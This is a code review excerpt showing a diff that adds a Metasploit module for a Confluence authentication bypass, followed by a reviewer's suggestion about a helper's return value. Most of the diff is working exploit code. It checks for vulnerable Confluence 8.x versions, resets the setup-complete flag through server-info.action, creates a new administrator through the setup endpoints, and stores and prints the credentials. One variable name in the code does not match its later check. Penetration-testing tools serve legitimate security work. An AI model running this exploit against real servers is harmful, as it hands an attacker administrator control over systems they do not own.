modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb

```diff
@@ -0,0 +1,141 @@
+    if confluence_version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.3.2')) ||
+       confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.2')) ||
+       confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.1'))
+      return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}")
+    end
+
+    Exploit::CheckCode::Safe("Confluence version: #{confluence_version}")
+  end
+
+  def run
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/server-info.action'),
+      'vars_get' => {
+        'bootstrapStatusProvider.applicationConfig.setupComplete' => 'false'
+      }
+    )
+
+    return fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Version vulnerable but setup is already completed') unless res&.code == 302 || res&.code == 200
+
+    print_good('Found server-info.action! Trying to ignore setup.')
+
+    created_user = create_admin_user
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'setup/finishsetup.action'),
+      'headers' => {
+        'X-Atlassian-Token' => 'no-check'
+      }
+    )
+    
+    return fail_with(Msf::Exploit::Failure::NoAccess, 'The admin user could not be created. Try a different username.') unless created
+
+    print_warning('Admin user was created but setup could not be completed.') unless res&.code == 200
+
+    create_credential({
+      workspace_id: myworkspace_id,
+      origin_type: :service,
+      module_fullname: fullname,
+      username: datastore['NEW_USERNAME'],
+      private_type: :password,
+      private_data: datastore['NEW_PASSWORD'],
+      service_name: 'Atlassian Confluence',
+      address: datastore['RHOST'],
+      port: datastore['RPORT'],
+      protocol: 'tcp',
+      status: Metasploit::Model::Login::Status::UNTRIED
+    })
+      
+    print_good("Admin user was created successfully. Credentials: #{datastore['NEW_USERNAME']} - #{datastore['NEW_PASSWORD']}")
+    print_good("Now you can login as administrator from: http://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}login.action")
+  end
+
+  def create_admin_user
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'setup/setupadministrator.action'),
+      'headers' => {
+        'X-Atlassian-Token' => 'no-check'
+      },
+      'vars_post' => {
+        'username' => datastore['NEW_USERNAME'],
+        'fullName' => 'New Admin',
+        'email' => datastore['NEW_EMAIL'],
+        'password' => datastore['NEW_PASSWORD'],
+        'confirm' => datastore['NEW_PASSWORD'],
+        'setup-next-button' => 'Next'
+      }
+    )
+
+    return fail_with(Msf::Exploit::Failure::NoAccess, 'The admin user could not be created. Try a different username.') unless res&.code == 302
+
+    print_good('Setup reverted back to the beginning. Attempting to create new admin user!')
```

Comment:
Since `#created_admin_user` is expected to return a boolean now, this should just be:

```suggestion
    res&.code == 302
```

That'll simply return `true` when `res.code == 302` because the user was created successfully.